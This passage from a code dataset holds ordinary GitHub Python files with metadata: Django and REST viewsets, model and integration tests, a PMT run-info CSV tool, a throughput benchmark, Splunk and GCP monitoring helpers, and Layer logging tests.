dependency into the pom.xml manifest file.\"\"\"\n print(\"\"\"\n \n {groupId}\n {artifactId}\n {version}\n \"\"\".format(groupId=groupId, artifactId=artifactId,\n version=version))\n\n\ndef json2pom(input):\n \"\"\"Transform the given JSON input file into the project file.\"\"\"\n print_header()\n\n dependencies = json.load(input)\n\n # transform all dependencies found in the source JSON file\n for dependency in dependencies:\n 
version = dependency[\"version\"]\n name = dependency[\"name\"]\n assert version\n assert name\n (groupId, artifactId) = name.split(\":\")\n print_dependency(version, groupId, artifactId)\n\n print_footer()\n\n\njson2pom(sys.stdin)\n", "repo_name": "fabric8-analytics/fabric8-analytics-common", "sub_path": "integration-tests/hack/json2pom.py", "file_name": "json2pom.py", "file_ext": "py", "file_size_in_byte": 1429, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "41", "api": [{"api_name": "json.load", "line_number": 42, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 56, "usage_type": "attribute"}]} +{"seq_id": "8815706707", "text": "import django.forms\nfrom django_filters import FilterSet, DateFilter\nfrom .models import *\n\n\nclass PostFilter(FilterSet):\n publishing_date = DateFilter(\n lookup_expr='gt', widget=django.forms.DateInput(attrs={'type': 'date'}\n )\n )\n\n class Meta:\n model = Post\n fields = {\n 'content': ['icontains'],\n 'title': ['icontains'],\n 'type': ['exact'],\n }\n", "repo_name": "keesulken/django_game_forum", "sub_path": "module13/news_paper/news/filters.py", "file_name": "filters.py", "file_ext": "py", "file_size_in_byte": 471, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django_filters.FilterSet", "line_number": 6, "usage_type": "name"}, {"api_name": "django_filters.DateFilter", "line_number": 7, "usage_type": "call"}, {"api_name": "django.forms.forms.DateInput", "line_number": 8, "usage_type": "call"}, {"api_name": "django.forms.forms", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 8, "usage_type": "name"}]} +{"seq_id": "7114631324", "text": "from rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.viewsets import ModelViewSet\nfrom products.models import Products\nfrom .serializers import ProductsSerializer\nimport logging\n\n\nclass ProductsViewSet(ModelViewSet):\n \"\"\"\n A simple ViewSet for viewing and editing accounts.\n \"\"\"\n queryset = Products.objects.all()\n serializer_class = ProductsSerializer\n\n def get_serializer(self, *args, **kwargs):\n kwargs['partial'] = True\n return super(ProductsViewSet, self).get_serializer(*args, **kwargs)\n\n def partial_update(self, request, *args, **kwargs):\n kwargs['partial'] = True\n logger = logging.getLogger(__name__)\n logger.error(request.data)\n return self.update(request, *args, **kwargs)\n\n @action(methods=[\"patch\"], detail=True)\n def decrement(self, request, pk=None, *args, **kwargs):\n kwargs['partial'] = True\n product = Products.objects.get(pk=pk)\n logger = logging.getLogger(__name__)\n logger.error(request.data)\n if product.stock_quantity > 0:\n product.stock_quantity -= 1\n request.data.update({'stock_quantity': product.stock_quantity})\n return self.update(request, *args, **kwargs)\n return Response({'message': 'Não há mais estoque desse produto!'}, status=status.HTTP_200_OK)\n\n @action(methods=[\"patch\"], detail=True)\n def increment(self, request, pk=None, *args, **kwargs):\n kwargs['partial'] = True\n product = Products.objects.get(pk=pk)\n request._full_data = {'stock_quantity': (product.stock_quantity + int(request.data.get('stock_quantity')))}\n if (product.stock_quantity + 1) < int(request.data.get('stock_quantity')):\n product.stock_quantity += 1\n request.data.update({'stock_quantity': 
product.stock_quantity})\n return self.update(request, *args, **kwargs)\n return Response({'message': 'Estoque máximo atingido'}, status=status.HTTP_200_OK)\n\n @action(methods=[\"patch\"], detail=True)\n def update_stock(self, request, pk=None, *args, **kwargs):\n kwargs['partial'] = True\n product = Products.objects.get(pk=pk)\n logger = logging.getLogger(__name__)\n logger.error(product.stock_quantity)\n request._full_data = {'stock_quantity': (product.stock_quantity + int(request.data.get('stock_quantity')))}\n logger.error(request._full_data)\n return self.update(request, *args, **kwargs)\n", "repo_name": "samanthacorrea/shopping-cart", "sub_path": "backend/products/api/viewsets.py", "file_name": "viewsets.py", "file_ext": "py", "file_size_in_byte": 2554, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 10, "usage_type": "name"}, {"api_name": "products.models.Products.objects.all", "line_number": 14, "usage_type": "call"}, {"api_name": "products.models.Products.objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "products.models.Products", "line_number": 14, "usage_type": "name"}, {"api_name": "serializers.ProductsSerializer", "line_number": 15, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 23, "usage_type": "call"}, {"api_name": "products.models.Products.objects.get", "line_number": 30, "usage_type": "call"}, {"api_name": "products.models.Products.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "products.models.Products", "line_number": 30, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 31, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 37, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 37, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 37, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 27, "usage_type": "call"}, {"api_name": "products.models.Products.objects.get", "line_number": 42, "usage_type": "call"}, {"api_name": "products.models.Products.objects", "line_number": 42, "usage_type": "attribute"}, {"api_name": "products.models.Products", "line_number": 42, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 48, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 48, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 48, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 39, "usage_type": "call"}, {"api_name": "products.models.Products.objects.get", "line_number": 53, "usage_type": "call"}, {"api_name": "products.models.Products.objects", "line_number": 53, "usage_type": "attribute"}, {"api_name": "products.models.Products", "line_number": 53, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 54, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "71696697725", "text": "from aplf.t3tsc.models import Res34Unet\nfrom torch import randn, empty\nimport torch.nn as nn\n\ndef test_res34unet() -> None:\n model = Res34Unet()\n batch_size = 1\n h = 256\n w = 256\n input_hv = randn(batch_size, 2, h, w)\n out = model(input_hv)\n assert out.shape == (batch_size, 2, h, w)\n\n\n\ndef 
test_loss() -> None:\n loss_fn = nn.CrossEntropyLoss()\n batch_size = 1\n num_channels = 5\n h = 300\n w = 300\n x = randn(batch_size, num_channels, h, w)\n y = empty(batch_size, h, w).random_(num_channels).long()\n loss = loss_fn(x, y)\n", "repo_name": "h4nyu/aplf", "sub_path": "app/tests/t3tsc/test_model.py", "file_name": "test_model.py", "file_ext": "py", "file_size_in_byte": 565, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "aplf.t3tsc.models.Res34Unet", "line_number": 6, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.randn", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.empty", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "4403904954", "text": "import json\nfrom typing import Any, Dict\n\nimport pandas as pd\nfrom mitosheet.is_type_utils import is_number_dtype\nfrom mitosheet.types import StepsManagerType\n\n\ndef get_column_describe(params: Dict[str, Any], steps_manager: StepsManagerType) -> Dict[str, Any]:\n \"\"\"\n Sends back a string that can be parsed to a JSON object that\n contains _all_ the results from the series .describe function\n for the series at column_header in the df at sheet_index.\n \"\"\"\n sheet_index = params['sheet_index']\n column_id = params['column_id']\n column_header = steps_manager.curr_step.get_column_header_by_id(sheet_index, column_id)\n \n series: pd.Series = steps_manager.dfs[sheet_index][column_header]\n column_dtype = str(series.dtype)\n describe = series.describe()\n\n describe_obj = {}\n\n for index, row in describe.items():\n # We turn all the items to strings, as some items are not valid JSON\n # e.g. some wacky numpy datatypes. 
This allows us to send all of this \n # to the front-end.\n\n # If the series is a number, round the statistics so they look good.\n if is_number_dtype(column_dtype):\n row = round(row, 2)\n\n describe_obj[index] = str(row)\n\n # We fill in some specific values that dont get filled by default\n describe_obj['count: NaN'] = str(series.isna().sum())\n\n # NOTE: be careful adding things here, as we dont want to destroy performance \n if is_number_dtype(column_dtype):\n describe_obj['median'] = str(round(series.median(), 2))\n describe_obj['sum'] = str(round(series.sum(), 2))\n\n return describe_obj\n", "repo_name": "mito-ds/monorepo", "sub_path": "mitosheet/mitosheet/api/get_column_describe.py", "file_name": "get_column_describe.py", "file_ext": "py", "file_size_in_byte": 1621, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1800, "dataset": "github-code", "pt": "41", "api": [{"api_name": "typing.Dict", "line_number": 9, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 9, "usage_type": "name"}, {"api_name": "mitosheet.types.StepsManagerType", "line_number": 9, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 19, "usage_type": "attribute"}, {"api_name": "mitosheet.is_type_utils.is_number_dtype", "line_number": 31, "usage_type": "call"}, {"api_name": "mitosheet.is_type_utils.is_number_dtype", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "42655812558", "text": "from __future__ import unicode_literals\n\nimport unittest, dataent, requests, time\nfrom dataent.test_runner import make_test_records\nfrom dataent.utils.selenium_testdriver import TestDriver\nfrom six.moves.urllib.parse import urlparse\nfrom dataent.dataentclient import DataentOAuth2Client\n\nclass TestDataentOAuth2Client(unittest.TestCase):\n\tdef setUp(self):\n\t\tself.driver = TestDriver()\n\t\tmake_test_records(\"OAuth Client\")\n\t\tmake_test_records(\"User\")\n\t\tself.client_id = dataent.get_all(\"OAuth Client\", fields=[\"*\"])[0].get(\"client_id\")\n\n\t\t# Set Dataent server URL reqired for id_token generation\n\t\ttry:\n\t\t\tdataent_login_key = dataent.get_doc(\"Social Login Key\", \"dataent\")\n\t\texcept dataent.DoesNotExistError:\n\t\t\tdataent_login_key = dataent.new_doc(\"Social Login Key\")\n\t\tdataent_login_key.get_social_login_provider(\"Dataent\", initialize=True)\n\t\tdataent_login_key.base_url = \"http://localhost:8000\"\n\t\tdataent_login_key.save()\n\n\tdef test_insert_note(self):\n\n\t\t# Go to Authorize url\n\t\tself.driver.get(\n\t\t\t\"api/method/dataent.integrations.oauth2.authorize?client_id=\" +\n\t\t\tself.client_id +\n\t\t\t\"&scope=all%20openid&response_type=code&redirect_uri=http%3A%2F%2Flocalhost\"\n\t\t)\n\n\t\ttime.sleep(2)\n\n\t\t# Login\n\t\tusername = self.driver.find(\"#login_email\")[0]\n\t\tusername.send_keys(\"test@example.com\")\n\n\t\tpassword = self.driver.find(\"#login_password\")[0]\n\t\tpassword.send_keys(\"Eastern_43A1W\")\n\n\t\tsign_in = self.driver.find(\".btn-login\")[0]\n\t\tsign_in.submit()\n\n\t\ttime.sleep(2)\n\n\t\t# Allow access to resource\n\t\tallow = self.driver.find(\"#allow\")[0]\n\t\tallow.click()\n\n\t\ttime.sleep(2)\n\n\t\t# Get authorization code from redirected URL\n\t\tauth_code = urlparse(self.driver.driver.current_url).query.split(\"=\")[1]\n\n\t\tpayload = \"grant_type=authorization_code&code=\"\n\t\tpayload += auth_code\n\t\tpayload += \"&redirect_uri=http%3A%2F%2Flocalhost&client_id=\"\n\t\tpayload += self.client_id\n\n\t\theaders = {'content-type':'application/x-www-form-urlencoded'}\n\n\t\t# 
Request for bearer token\n\t\ttoken_response = requests.post( dataent.get_site_config().host_name +\n\t\t\t\"/api/method/dataent.integrations.oauth2.get_token\", data=payload, headers=headers)\n\n\t\t# Parse bearer token json\n\t\tbearer_token = token_response.json()\n\t\tclient = DataentOAuth2Client(dataent.get_site_config().host_name, bearer_token.get(\"access_token\"))\n\n\t\tnotes = [\n\t\t\t{\"doctype\": \"Note\", \"title\": \"Sing\", \"public\": True},\n\t\t\t{\"doctype\": \"Note\", \"title\": \"a\", \"public\": True},\n\t\t\t{\"doctype\": \"Note\", \"title\": \"Song\", \"public\": True},\n\t\t\t{\"doctype\": \"Note\", \"title\": \"of\", \"public\": True},\n\t\t\t{\"doctype\": \"Note\", \"title\": \"sixpence\", \"public\": True}\n\t\t]\n\n\t\tfor note in notes:\n\t\t\tclient.insert(note)\n\n\t\tself.assertTrue(len(dataent.get_all(\"Note\")) == 5)\n", "repo_name": "dataent/dataent", "sub_path": "dataent/tests/test_dataentoauth2client.py", "file_name": "test_dataentoauth2client.py", "file_ext": "py", "file_size_in_byte": 2674, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "unittest.TestCase", "line_number": 9, "usage_type": "attribute"}, {"api_name": "dataent.utils.selenium_testdriver.TestDriver", "line_number": 11, "usage_type": "call"}, {"api_name": "dataent.test_runner.make_test_records", "line_number": 12, "usage_type": "call"}, {"api_name": "dataent.test_runner.make_test_records", "line_number": 13, "usage_type": "call"}, {"api_name": "dataent.get_all", "line_number": 14, "usage_type": "call"}, {"api_name": "dataent.get_doc", "line_number": 18, "usage_type": "call"}, {"api_name": "dataent.DoesNotExistError", "line_number": 19, "usage_type": "attribute"}, {"api_name": "dataent.new_doc", "line_number": 20, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 34, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 46, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 52, "usage_type": "call"}, {"api_name": "six.moves.urllib.parse.urlparse", "line_number": 55, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 65, "usage_type": "call"}, {"api_name": "dataent.get_site_config", "line_number": 65, "usage_type": "call"}, {"api_name": "dataent.dataentclient.DataentOAuth2Client", "line_number": 70, "usage_type": "call"}, {"api_name": "dataent.get_site_config", "line_number": 70, "usage_type": "call"}, {"api_name": "dataent.get_all", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "73878749882", "text": "'''\nProcess data in csv format\n+ fetch run information\n+ fetch the channel mapping for each pmt\npython3 CSVDatabase.py --origincsv runinfo/697.csv --runcsv runinfo/RUNINFO.csv --testcsv runinfo/TESTINFO.csv\n'''\nfrom select import select\nfrom multidict import istr\nimport pandas as pd, numpy as np\nimport argparse\nimport datetime\nclass CSVReader(object):\n def __init__(self, filename):\n self.csv = pd.read_csv(filename)\n self.filename = filename\n\nclass PMTINFO(CSVReader):\n # fetch pmt information: PMT,HV_r\n def __init__(self, filename):\n super(PMTINFO, self).__init__(filename)\n self.pmtinfo = self.csv.set_index('PMT')\n def getPMTInfo(self, pmt):\n return self.pmtinfo.loc[pmt]\nclass OriginINFO(CSVReader):\n # fetch input run information: CHANNEL,BOXID,PMT,TRIGGER,MODE\n def __init__(self, filename):\n super(OriginINFO, self).__init__(filename)\n def getPMT(self):\n return self.csv['PMT']\n def getMode(self):\n return self.csv.iloc[0]['MODE']\nclass RUNINFO(CSVReader):\n # set RUN information: RUNNO,DATE,ISTRIGGER\n def 
__init__(self, filename):\n        super(RUNINFO, self).__init__(filename)\n        self.runinfo = self.csv.set_index('RUNNO')\n    def updateAppend(self, runno, date, mode):\n        # update or append a single run\n        self.runinfo.loc[runno] = (date, mode)\n    def getMode(self, runno):\n        return self.runinfo.loc[runno]['MODE']\n    def save(self):\n        self.runinfo.reset_index().to_csv(self.filename, index=False)\nclass TESTINFO(CSVReader):\n    # test info setter: RUNNO,CHANNEL,BOXID,HV,PMT\n    def __init__(self, filename):\n        super(TESTINFO, self).__init__(filename)\n    def appendRun(self, runno, origininfo, HV):\n        origininfo['RUNNO'] = runno\n        origininfo['HV'] = HV.astype('float64').values\n        self.csv = pd.concat([self.csv, origininfo], join=\"inner\")\n    def getChannel(self, runno, istrigger=True):\n        testcsv = self.csv.groupby('RUNNO').get_group(runno)\n        if istrigger:\n            return testcsv.iloc[0]['TRIGGER']\n        else:\n            return testcsv['CHANNEL'].values\n    def save(self):\n        self.csv.to_csv(self.filename, index=False)\nif __name__==\"__main__\":\n    psr = argparse.ArgumentParser()\n    psr.add_argument('--origincsv', help='origin csv file')\n    psr.add_argument('--runcsv', help='run csv file')\n    psr.add_argument('--testcsv', help='test csv file')\n    psr.add_argument('--run', type=int, default=-1, help='run no')\n    psr.add_argument('--para', default='istrigger')\n    psr.add_argument('-i', dest='ipt', help='ID of PMT')\n    psr.add_argument('-o', dest='opt', help='name of output csv')\n    args = psr.parse_args()\n    if (not (args.para=='pmts' or args.para=='pmtruns')) and args.run==-1:\n        print('run parameter is not set and para is {}'.format(args.para))\n        exit(0)\n    # origininfo = OriginINFO(args.origincsv)\n    runinfo = RUNINFO(args.runcsv)\n    testinfo = TESTINFO(args.testcsv)\n    if args.para=='istrigger':\n        print(runinfo.getMode(args.run))\n    elif args.para=='triggerch':\n        print(testinfo.getChannel(args.run))\n    elif args.para=='ch':\n        print(' '.join(map(str,testinfo.getChannel(args.run, istrigger=False))))\n    elif args.para=='pmts':\n        # Default read exclude runs\n        excluderuns = np.loadtxt('ExPMT/ExcludeRun.csv')\n        excludepmts = np.loadtxt('ExPMT/ExcludePMT.csv', dtype=np.str_)\n        pmtsInRuns = np.unique(testinfo.csv[~testinfo.csv['RUNNO'].isin(excluderuns)]['PMT'].values)\n        selected = [(pmt not in excludepmts) for pmt in pmtsInRuns]\n        print(' '.join(pmtsInRuns[selected]))\n    elif args.para=='pmtruns':\n        pd.merge(testinfo.csv[testinfo.csv['PMT']==args.ipt], runinfo.csv[['RUNNO', 'MODE']], on='RUNNO').to_csv(args.opt, index=False)\n    else:\n        print('error')", "repo_name": "greatofdream/pmtTest", "sub_path": "csvDatabase.py", "file_name": "csvDatabase.py", "file_ext": "py", "file_size_in_byte": 3820, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pandas.read_csv", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 51, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.str_", "line_number": 85, "usage_type": "attribute"}, {"api_name": "numpy.unique", "line_number": 86, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 90, "usage_type": "call"}]}
+{"seq_id": "16310705676", "text": "from greenlet import GreenletExit\nfrom logging import getLogger\nimport random\nimport string\nfrom collections import Counter\nimport gevent\nfrom gevent import 
Greenlet\nfrom kvclient.exceptions import SystemOverloadError\nfrom testing.base import IndependentNodesTest, ClusteredNodesTest, Test\n\nl = getLogger(__name__)\n\n\nclass BadReturnedValueError(Exception):\n pass\n\n\nclass ThroughputResult(object):\n ADDRESS_KEY = 'node'\n\n def __init__(self, address, values):\n self.address = address\n self.values = values\n\n def to_dict(self):\n return {\n self.ADDRESS_KEY: self.address,\n 'data': self.values,\n 'x_axis': 'Client Count',\n 'y_axis': 'Requests/s',\n }\n\n\nclass ClusteredThroughputResult(ThroughputResult):\n ADDRESS_KEY = 'nodes'\n\n\nclass ThroughputTestBase(Test):\n client_counts = [1, 8, 16, 32]\n test_length_seconds = 60\n\n def set_client_counts(self, client_counts):\n self.client_counts = client_counts\n return self\n\n def set_test_length_seconds(self, test_length_seconds):\n self.test_length_seconds = test_length_seconds\n return self\n\n def run_test(self):\n self.test_running = False\n node_result = []\n\n for client_count in self.client_counts:\n requests = Counter()\n client_creator = self.make_client_creator(requests)\n client_prefixes = [str(i) for i in range(100000, 100000 + client_count)]\n clients = map(client_creator, client_prefixes)\n self.test_running = True\n map(lambda g: g.start(), clients)\n gevent.sleep(self.test_length_seconds)\n self.test_running = False\n gevent.killall(clients)\n r = {\n 'Client Count': client_count,\n 'Requests/s': {k: v/self.test_length_seconds for k, v in requests.items()},\n }\n l.info(r)\n node_result.append(r)\n return node_result\n\n def make_client_creator(self, counter):\n def client_creator(test_prefix):\n return Greenlet(self.client_runner, test_prefix, counter)\n return client_creator\n\n def client_runner(self, test_prefix, counter):\n while self.test_running:\n try:\n self.run_key(test_prefix)\n counter['success'] += 1\n except GreenletExit:\n return\n except SystemOverloadError:\n counter['overload'] += 1\n gevent.sleep()\n except Exception:\n counter['failed'] += 1\n gevent.sleep()\n\n def run_key(self, test_prefix):\n key = test_prefix + self.get_key()\n value = ''.join(random.choice(string.ascii_lowercase) for _ in range(10))\n self.get_client().put(key, value)\n if value != self.get_client().get(key)[0:10]:\n raise BadReturnedValueError()\n self.get_client().delete(key)\n\n def get_key(self, length=26):\n return ''.join(random.choice(string.ascii_lowercase) for _ in range(length))\n\n\nclass ThroughputTest(ThroughputTestBase, IndependentNodesTest):\n result_class = ThroughputResult\n\n\nclass ClusteredThroughputTest(ThroughputTestBase, ClusteredNodesTest):\n result_class = ClusteredThroughputResult\n", "repo_name": "squirly/eece411-kvclient", "sub_path": "testing/throughput_test.py", "file_name": "throughput_test.py", "file_ext": "py", "file_size_in_byte": 3305, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "testing.base.Test", "line_number": 38, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 55, "usage_type": "call"}, {"api_name": "gevent.sleep", "line_number": 61, "usage_type": "call"}, {"api_name": "gevent.killall", "line_number": 63, "usage_type": "call"}, {"api_name": "gevent.Greenlet", "line_number": 74, "usage_type": "call"}, {"api_name": "greenlet.GreenletExit", "line_number": 82, "usage_type": "name"}, {"api_name": "kvclient.exceptions.SystemOverloadError", "line_number": 84, 
"usage_type": "name"}, {"api_name": "gevent.sleep", "line_number": 86, "usage_type": "call"}, {"api_name": "gevent.sleep", "line_number": 89, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 93, "usage_type": "call"}, {"api_name": "string.ascii_lowercase", "line_number": 93, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 100, "usage_type": "call"}, {"api_name": "string.ascii_lowercase", "line_number": 100, "usage_type": "attribute"}, {"api_name": "testing.base.IndependentNodesTest", "line_number": 103, "usage_type": "name"}, {"api_name": "testing.base.ClusteredNodesTest", "line_number": 107, "usage_type": "name"}]} +{"seq_id": "38846888227", "text": "import os\nimport random\nfrom time import sleep\n\nimport pytest\nimport splunklib.client as client\n\n\n@pytest.fixture(scope=\"module\")\ndef setup_wordlist():\n path_to_current_file = os.path.realpath(__file__)\n current_directory = os.path.split(path_to_current_file)[0]\n path_to_file = os.path.join(current_directory, \"data/wordlist.txt\")\n\n wordlist = [line.rstrip('\\n') for line in open(path_to_file)]\n return wordlist\n\n\n@pytest.fixture\ndef get_host_key(setup_wordlist):\n part1 = random.choice(setup_wordlist)\n part2 = random.choice(setup_wordlist)\n host = \"{}-{}\".format(part1, part2)\n\n return host\n\n\n@pytest.fixture\ndef setup_splunk():\n tried = 0\n while True:\n try:\n c = client.connect(username=\"admin\", password=\"Changed@11\", host=\"splunk\", port=\"8089\")\n break\n except ConnectionRefusedError:\n tried += 1\n if tried > 600:\n raise\n sleep(1)\n return c\n", "repo_name": "vishweshkumarp-splunk/splunk-connect-for-syslog", "sub_path": "tests/conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 966, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.path.realpath", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 9, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 21, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 22, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 19, "usage_type": "attribute"}, {"api_name": "splunklib.client.connect", "line_number": 33, "usage_type": "call"}, {"api_name": "splunklib.client", "line_number": 33, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 39, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 28, "usage_type": "attribute"}]} +{"seq_id": "36128094383", "text": "import os\n\nfrom google.cloud import monitoring_v3\n\n\nclass MissingProjectIdError(Exception):\n pass\n\n\ndef add_new_metric(project_id, metric_type, desc):\n \"\"\"Add new Metrics for StackDriver.\n\n Args:\n project_id: (str) GCP project id.\n metric_type: (int) MetricDescriptor type.\n desc: (str) MetricDescriptor description.\n\n Raises:\n MissingProjectIdError: GCP Project id is not defined.\n \"\"\"\n if not project_id:\n raise MissingProjectIdError(\n 'Set the environment variable GCLOUD_PROJECT to your GCP Project '\n 'ID.')\n descriptor = 
monitoring_v3.types.MetricDescriptor()\n descriptor.type = 'custom.googleapis.com/{type}'.format(type=metric_type)\n descriptor.metric_kind = (\n monitoring_v3.enums.MetricDescriptor.MetricKind.GAUGE)\n descriptor.value_type = (\n monitoring_v3.enums.MetricDescriptor.ValueType.INT64)\n descriptor.description = desc\n # Create Metric Descriptor.\n client = monitoring_v3.MetricServiceClient()\n project_name = client.common_project_path(project_id)\n descriptor = client.create_metric_descriptor(project_name, descriptor)\n print('Created {}.'.format(descriptor.name))\n\n\ndef main():\n # Get Project id information.\n project_id = (\n os.environ.get('GOOGLE_CLOUD_PROJECT') or\n os.environ.get('GCLOUD_PROJECT'))\n add_new_metric(project_id, 'utilization_memory',\n 'Metric for GPU utilization.')\n add_new_metric(project_id, 'utilization_gpu',\n 'Metric for GPU memory utilization.')\n add_new_metric(project_id, 'memory_used',\n 'Metric for amount of GPU memory used.')\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "GoogleCloudPlatform/ml-on-gcp", "sub_path": "dlvm/gcp-gpu-utilization-metrics/create_gpu_metrics.py", "file_name": "create_gpu_metrics.py", "file_ext": "py", "file_size_in_byte": 1712, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 472, "dataset": "github-code", "pt": "41", "api": [{"api_name": "google.cloud.monitoring_v3.types.MetricDescriptor", "line_number": 25, "usage_type": "call"}, {"api_name": "google.cloud.monitoring_v3.types", "line_number": 25, "usage_type": "attribute"}, {"api_name": "google.cloud.monitoring_v3", "line_number": 25, "usage_type": "name"}, {"api_name": "google.cloud.monitoring_v3.enums", "line_number": 28, "usage_type": "attribute"}, {"api_name": "google.cloud.monitoring_v3", "line_number": 28, "usage_type": "name"}, {"api_name": "google.cloud.monitoring_v3.enums", "line_number": 30, "usage_type": "attribute"}, {"api_name": "google.cloud.monitoring_v3", "line_number": 30, "usage_type": "name"}, {"api_name": "google.cloud.monitoring_v3.MetricServiceClient", "line_number": 33, "usage_type": "call"}, {"api_name": "google.cloud.monitoring_v3", "line_number": 33, "usage_type": "name"}, {"api_name": "os.environ.get", "line_number": 42, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 43, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 43, "usage_type": "attribute"}]} +{"seq_id": "16809977829", "text": "from uuid import UUID\n\nimport numpy as np\nimport pandas as pd\nimport pytest\nfrom sklearn.svm import SVC\n\nimport layer\nfrom layer.clients.layer import LayerClient\nfrom layer.contracts.logged_data import LoggedDataType, Video\nfrom layer.contracts.projects import Project\nfrom layer.decorators import dataset, model, pip_requirements\nfrom layer.exceptions.exceptions import LayerClientResourceNotFoundException\nfrom test.e2e.assertion_utils import E2ETestAsserter\n\n\ndef test_logging_in_remote_execution(\n initialized_project: Project, asserter: E2ETestAsserter, client: LayerClient\n):\n # given\n dataset_name = \"scalar_ds\"\n\n str_tag = \"str_tag\"\n\n @dataset(dataset_name)\n def scalar():\n data = [[1, \"product1\", 15], [2, \"product2\", 20], [3, \"product3\", 10]]\n dataframe = pd.DataFrame(data, columns=[\"Id\", \"Product\", \"Price\"])\n layer.log(\n {\n str_tag: \"bar\",\n }\n )\n return dataframe\n\n # when\n run = layer.run([scalar])\n\n # then\n asserter.assert_run_succeeded(run.id)\n\n first_ds = 
client.data_catalog.get_dataset_by_name(\n initialized_project.id, dataset_name\n )\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=str_tag, dataset_build_id=first_ds.id\n )\n assert logged_data.value == \"bar\"\n assert logged_data.logged_data_type == LoggedDataType.TEXT\n assert logged_data.tag == str_tag\n\n\ndef test_dataset_get_metadata_and_changing_old_version_logged_data(\n initialized_project: Project, asserter: E2ETestAsserter, client: LayerClient\n):\n # given\n dataset_name = \"scalar_ds\"\n\n @dataset(dataset_name)\n def scalarv1():\n data = [[1, \"product1\", 15], [2, \"product2\", 20], [3, \"product3\", 10]]\n dataframe = pd.DataFrame(data, columns=[\"Id\", \"Product\", \"Price\"])\n layer.log(\n {\n \"zoo\": 567,\n }\n )\n return dataframe\n\n # same dataset as above, but with different content\n @dataset(dataset_name)\n def scalarv2():\n data = [[11, \"product1\", 155], [22, \"product2\", 200], [3, \"product3\", 1000]]\n dataframe = pd.DataFrame(data, columns=[\"Id\", \"Product\", \"Price\"])\n layer.log(\n {\n \"str_tag\": \"bar\",\n }\n )\n return dataframe\n\n scalarv1()\n\n ds_v1 = layer.get_dataset(dataset_name)\n\n scalarv2()\n ds_v2 = 